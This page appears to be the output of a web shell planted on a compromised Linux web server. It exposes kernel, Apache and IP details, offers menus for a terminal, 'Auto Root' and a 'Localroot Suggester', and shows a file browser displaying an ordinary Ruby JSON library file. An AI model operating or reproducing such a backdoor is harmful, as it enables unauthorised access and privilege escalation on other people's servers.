Linux cesa-www-main 6.1.0-49-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.174-1 (2026-05-26) x86_64
Apache/2.4.68 (Debian)
Server IP : 10.218.0.2 & Your IP : 216.73.216.28
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
lib /
ruby /
3.1.0 /
json /
Delete
Unzip
Name
Size
Permission
Date
Action
add
[ DIR ]
drwxr-xr-x
2025-06-05 11:22
common.rb
20.85
KB
-rw-r--r--
2024-04-26 07:47
ext.rb
391
B
-rw-r--r--
2024-04-26 07:47
generic_object.rb
1.39
KB
-rw-r--r--
2024-04-26 07:47
version.rb
302
B
-rw-r--r--
2024-04-26 07:47
Save
Rename
require 'json/common' module JSON # This module holds all the modules/classes that implement JSON's # functionality as C extensions. module Ext require 'json/ext/parser' require 'json/ext/generator' $DEBUG and warn "Using Ext extension for JSON." JSON.parser = Parser JSON.generator = Generator end JSON_LOADED = true unless defined?(::JSON::JSON_LOADED) end